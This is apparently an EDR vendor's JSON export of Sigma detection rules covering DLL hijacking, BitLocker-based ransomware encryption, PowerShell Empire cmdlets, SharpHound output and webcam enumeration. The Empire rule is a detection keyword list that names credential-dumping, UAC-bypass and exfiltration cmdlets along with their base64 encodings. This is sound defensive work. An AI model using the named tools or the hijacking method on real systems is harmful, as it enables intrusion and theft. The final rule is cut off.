"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mtstocom.yml",
"content": "title: DLL Hijacking via mtstocom.exe\nid: 86f9066e-8897-465c-a981-974f87b66ed6\ndescription: |\n Detects potential Windows DLL Hijacking via mtstocom.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mtstocom.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86f9066e-8897-465c-a981-974f87b66ed6",
"rule_name": "DLL Hijacking via mtstocom.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mtstocom.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8725a177-c7fd-4bad-a3e7-915fc609c991",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609567Z",
"creation_date": "2026-03-23T11:45:34.609570Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609578Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
"https://attack.mitre.org/techniques/T1486/"
],
"name": "t1486_suspicious_bitlocker_installation.yml",
"content": "title: BitLocker Installed via PowerShell\nid: 8725a177-c7fd-4bad-a3e7-915fc609c991\ndescription: |\n Detects the suspicious installation of BitLocker through PowerShell.\n This technique has been abused by DEV-0270 in a September 2022 campaign to encrypt disk drives for impact.\n It is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this action is legitimate.\nreferences:\n - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\n - https://attack.mitre.org/techniques/T1486/\ndate: 2022/10/06\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1486\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Encryption\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_install:\n PowershellCommand|contains|all:\n - 'Install-WindowsFeature '\n - 'BitLocker'\n\n selection_enabling:\n PowershellCommand|contains|all:\n - 'Enable-BitLocker '\n - 'EncryptionMethod '\n - 'skiphardwaretest '\n - 'password'\n\n exclusion_recoverypassword:\n PowershellCommand|contains: '-RecoveryPasswordProtector'\n\n exclusion_mbam_recovery:\n ProcessCommandLine|contains: '\\bin\\x64\\mbamrecoveryserviceinstaller.ps1'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8725a177-c7fd-4bad-a3e7-915fc609c991",
"rule_name": "BitLocker Installed via PowerShell",
"rule_description": "Detects the suspicious installation of BitLocker through PowerShell.\nThis technique has been abused by DEV-0270 in a September 2022 campaign to encrypt disk drives for impact.\nIt is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this action is legitimate.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1486"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8732348d-98d7-4fca-bbec-2a24b491b836",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092545Z",
"creation_date": "2026-03-23T11:45:34.092547Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092551Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/EmpireProject/Empire/tree/master/data/module_source",
"https://github.com/BC-SECURITY/Empire",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_empire_cmd.yml",
"content": "title: Malicious PowerShell Empire Commandlets in Command-line\nid: 8732348d-98d7-4fca-bbec-2a24b491b836\ndescription: |\n Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent.\n This rule detects various malicious commandlets in PowerShell's command-line, generally associated with the Empire framework.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/EmpireProject/Empire/tree/master/data/module_source\n - https://github.com/BC-SECURITY/Empire\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Empire\nlogsource:\n category: process_creation\n product: windows\ndetection:\n powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n malicious_cmdlet:\n CommandLine|contains:\n # Get-FoxDump, from Empire\n - 'Get-FoxDump'\n - 'RwBlAHQALQBGAG8AeABEAHUAbQBwA'\n - 'cAZQB0AC0ARgBvAHgARAB1AG0AcA'\n - 'HAGUAdAAtAEYAbwB4AEQAdQBtAHAA'\n # Get-Screenshot, from Empire\n - 'Get-Screenshot'\n - 'RwBlAHQALQBTAGMAcgBlAGUAbgBzAGgAbwB0A'\n - 'cAZQB0AC0AUwBjAHIAZQBlAG4AcwBoAG8AdA'\n - 'HAGUAdAAtAFMAYwByAGUAZQBuAHMAaABvAHQA'\n # Invoke-NetRipper, from Empire\n - 'Invoke-NetRipper'\n - 'SQBuAHYAbwBrAGUALQBOAGUAdABSAGkAcABwAGUAcg'\n - 'kAbgB2AG8AawBlAC0ATgBlAHQAUgBpAHAAcABlAHIA'\n - 'JAG4AdgBvAGsAZQAtAE4AZQB0AFIAaQBwAHAAZQByA'\n # Invoke-EgressCheck, from Empire\n - 'Invoke-EgressCheck'\n - 'SQBuAHYAbwBrAGUALQBFAGcAcgBlAHMAcwBDAGgAZQBjAGsA'\n - 'kAbgB2AG8AawBlAC0ARQBnAHIAZQBzAHMAQwBoAGUAYwBrA'\n - 'JAG4AdgBvAGsAZQAtAEUAZwByAGUAcwBzAEMAaABlAGMAaw'\n # Invoke-PostExfil, from Empire\n - 'Invoke-PostExfil'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcwB0AEUAeABmAGkAbA'\n - 'kAbgB2AG8AawBlAC0AUABvAHMAdABFAHgAZgBpAGwA'\n - 
'JAG4AdgBvAGsAZQAtAFAAbwBzAHQARQB4AGYAaQBsA'\n # Invoke-PSInject, from Empire\n - 'Invoke-PSInject'\n - 'SQBuAHYAbwBrAGUALQBQAFMASQBuAGoAZQBjAHQA'\n - 'kAbgB2AG8AawBlAC0AUABTAEkAbgBqAGUAYwB0A'\n - 'JAG4AdgBvAGsAZQAtAFAAUwBJAG4AagBlAGMAdA'\n # New-HoneyHash, from Empire\n - 'New-HoneyHash'\n - 'TgBlAHcALQBIAG8AbgBlAHkASABhAHMAaA'\n - '4AZQB3AC0ASABvAG4AZQB5AEgAYQBzAGgA'\n - 'OAGUAdwAtAEgAbwBuAGUAeQBIAGEAcwBoA'\n # Invoke-PowerDump, from Empire\n - 'Invoke-PowerDump'\n - 'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIARAB1AG0AcA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAEQAdQBtAHAA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBEAHUAbQBwA'\n # Exploit-Jboss, from Empire\n - 'Exploit-Jboss'\n - 'RQB4AHAAbABvAGkAdAAtAEoAYgBvAHMAcw'\n - 'UAeABwAGwAbwBpAHQALQBKAGIAbwBzAHMA'\n - 'FAHgAcABsAG8AaQB0AC0ASgBiAG8AcwBzA'\n # Invoke-BackdoorLNK, from Empire / HarmJ0y\n - 'Invoke-BackdoorLNK'\n - 'SQBuAHYAbwBrAGUALQBCAGEAYwBrAGQAbwBvAHIATABOAEsA'\n - 'kAbgB2AG8AawBlAC0AQgBhAGMAawBkAG8AbwByAEwATgBLA'\n - 'JAG4AdgBvAGsAZQAtAEIAYQBjAGsAZABvAG8AcgBMAE4ASw'\n # Invoke-BypassUAC, from Empire\n - 'Invoke-BypassUAC'\n - 'SQBuAHYAbwBrAGUALQBCAHkAcABhAHMAcwBVAEEAQw'\n - 'kAbgB2AG8AawBlAC0AQgB5AHAAYQBzAHMAVQBBAEMA'\n - 'JAG4AdgBvAGsAZQAtAEIAeQBwAGEAcwBzAFUAQQBDA'\n # Invoke-Tater, from Empire\n - 'Invoke-Tater'\n - 'SQBuAHYAbwBrAGUALQBUAGEAdABlAHIA'\n - 'kAbgB2AG8AawBlAC0AVABhAHQAZQByA'\n - 'JAG4AdgBvAGsAZQAtAFQAYQB0AGUAcg'\n # Invoke-Paranoia, from Empire\n - 'Invoke-Paranoia'\n - 'SQBuAHYAbwBrAGUALQBQAGEAcgBhAG4AbwBpAGEA'\n - 'kAbgB2AG8AawBlAC0AUABhAHIAYQBuAG8AaQBhA'\n - 'JAG4AdgBvAGsAZQAtAFAAYQByAGEAbgBvAGkAYQ'\n # Invoke-WinEnum, from Empire\n - 'Invoke-WinEnum'\n - 'SQBuAHYAbwBrAGUALQBXAGkAbgBFAG4AdQBtA'\n - 'kAbgB2AG8AawBlAC0AVwBpAG4ARQBuAHUAbQ'\n - 'JAG4AdgBvAGsAZQAtAFcAaQBuAEUAbgB1AG0A'\n # Invoke-ARPScan, from Empire\n - 'Invoke-ARPScan'\n - 'SQBuAHYAbwBrAGUALQBBAFIAUABTAGMAYQBuA'\n - 'kAbgB2AG8AawBlAC0AQQBSAFAAUwBjAGEAbg'\n - 'JAG4AdgBvAGsAZQAtAEEAUgBQAFMAYwBhAG4A'\n\n exclusion_signageos:\n # 
Get-ScreenshotHelper.ps1 + Get-Screenshot.ps1\n ProcessCommandLine: '*\\signageos\\server\\powershell\\Get-Screenshot*.ps1 -screenshotFilePath *\\signageOS\\fileSystem\\tmp\\screenshots\\\\*.png'\n\n condition: powershell and malicious_cmdlet and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8732348d-98d7-4fca-bbec-2a24b491b836",
"rule_name": "Malicious PowerShell Empire Commandlets in Command-line",
"rule_description": "Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent.\nThis rule detects various malicious commandlets in PowerShell's command-line, generally associated with the Empire framework.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8756b4ce-2c2d-458c-9663-402ab0d945d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099248Z",
"creation_date": "2026-03-23T11:45:34.099250Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099254Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netbtugc.yml",
"content": "title: DLL Hijacking via netbtugc.exe\nid: 8756b4ce-2c2d-458c-9663-402ab0d945d9\ndescription: |\n Detects potential Windows DLL Hijacking via netbtugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netbtugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8756b4ce-2c2d-458c-9663-402ab0d945d9",
"rule_name": "DLL Hijacking via netbtugc.exe",
"rule_description": "Detects potential Windows DLL hijacking via netbtugc.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a malicious DLL alongside the victim application so that it is loaded in place of the legitimate library.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThis rule fires when a Microsoft-signed netbtugc.exe loads dbgcore.dll, dbghelp.dll, IPHLPAPI.DLL or wdscore.dll while neither the process nor the library resides under System32, SysWOW64 or WinSxS and the library is not itself signed by Microsoft Windows.\nIt is recommended to investigate the loaded library (path, hash, signature) for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8780eb74-cf3c-4641-bf62-2597cf3cae7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085282Z",
"creation_date": "2026-03-23T11:45:34.085284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085288Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html",
"https://attack.mitre.org/techniques/T1560/",
"https://attack.mitre.org/software/S0521/"
],
"name": "t1560_bloodhound_file_creation.yml",
"content": "title: SharpHound Domain Enumeration File Created\nid: 8780eb74-cf3c-4641-bf62-2597cf3cae7c\ndescription: |\n Detects files with SharpHound default nomenclature being written to disk.\n These files can either be .json files containing information about Active Directory objects or a zip file containing them.\n SharpHound is known to be used by attackers during the discovery phase to enumerate domains and find privilege escalation paths. Typically, SharpHound will be executed via a .ps1 or .exe file.\n It is recommended to determine if this action comes from internal tests and to look for other suspicious actions on the host.\nreferences:\n - https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html\n - https://attack.mitre.org/techniques/T1560/\n - https://attack.mitre.org/software/S0521/\ndate: 2023/06/13\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - classification.Windows.Source.Filesystem\n - classification.Windows.HackTool.SharpHound\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Collection\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\20???????????_BloodHound.zip'\n - '\\20???????????_computers.json'\n - '\\20???????????_domains.json'\n - '\\20???????????_users.json'\n - '\\20???????????_gpos.json'\n - '\\20???????????_ous.json'\n - '\\20????????????_BloodHound.zip'\n - '\\20????????????_computers.json'\n - '\\20????????????_domains.json'\n - '\\20????????????_users.json'\n - '\\20????????????_gpos.json'\n - '\\20????????????_ous.json'\n\n exclusion_explorer:\n Image: '?:\\Windows\\explorer.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8780eb74-cf3c-4641-bf62-2597cf3cae7c",
"rule_name": "SharpHound Domain Enumeration File Created",
"rule_description": "Detects files following SharpHound's default naming convention (a timestamp prefix followed by _BloodHound.zip, _computers.json, _domains.json, _users.json, _gpos.json or _ous.json) being written to disk.\nThese files are either .json files containing information about Active Directory objects or a zip archive bundling them.\nSharpHound, the data collector for BloodHound, is known to be used by attackers during the discovery phase to enumerate domains and find privilege escalation paths. Typically, SharpHound is executed via a .ps1 or .exe file.\nBecause the match relies on default file names, output written under custom names will not be detected; file creations by a Microsoft-signed explorer.exe (e.g. a copy or move in the file explorer) are excluded.\nIt is recommended to determine whether this activity comes from an authorized internal assessment and to look for other suspicious actions on the host, starting with the process that wrote the file.\n",
"rule_creation_date": "2023-06-13",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "878a5509-175f-4fe1-977c-3f21e842a9bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098536Z",
"creation_date": "2026-03-23T11:45:34.098538Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098542Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dataexchangehost.yml",
"content": "title: DLL Hijacking via dataexchangehost.exe\nid: 878a5509-175f-4fe1-977c-3f21e842a9bb\ndescription: |\n Detects potential Windows DLL Hijacking via dataexchangehost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dataexchangehost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\twinapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "878a5509-175f-4fe1-977c-3f21e842a9bb",
"rule_name": "DLL Hijacking via dataexchangehost.exe",
"rule_description": "Detects potential Windows DLL hijacking via dataexchangehost.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a malicious DLL alongside the victim application so that it is loaded in place of the legitimate library.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThis rule fires when a Microsoft-signed dataexchangehost.exe loads d2d1.dll, d3d11.dll, dcomp.dll, DWrite.dll, dxgi.dll or twinapi.dll while neither the process nor the library resides under System32, SysWOW64 or WinSxS and the library is not itself signed by Microsoft Windows.\nIt is recommended to investigate the loaded library (path, hash, signature) for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87b85835-9289-4adc-bac4-c9cea4811f93",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083243Z",
"creation_date": "2026-03-23T11:45:34.083246Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083250Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/cb79101125064af2721b8346628db114999e4dfa/atomics/T1592.001/T1592.001.md",
"https://www.mandiant.com/resources/blog/analyzing-dark-crystal-rat-backdoor",
"https://attack.mitre.org/techniques/T1592/001/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1592_001_enumerate_plugnplay_webcams.yml",
"content": "title: PnP Webcams Enumerated via PowerShell\nid: 87b85835-9289-4adc-bac4-c9cea4811f93\ndescription: |\n Detects execution of PowerShell command related to enumerate plug and play webcams.\n Attackers may use it during the discovery phase.\n This technique was seen in dcrat malware backdoor capabilities where it enumerates the camera info mounted on the compromised host.\n It is recommended to investigate the process responsible for the script execution as well as its ancestors to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/cb79101125064af2721b8346628db114999e4dfa/atomics/T1592.001/T1592.001.md\n - https://www.mandiant.com/resources/blog/analyzing-dark-crystal-rat-backdoor\n - https://attack.mitre.org/techniques/T1592/001/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/12/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.discovery\n - attack.t1592.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'SELECT * FROM Win32_PnPEntity'\n 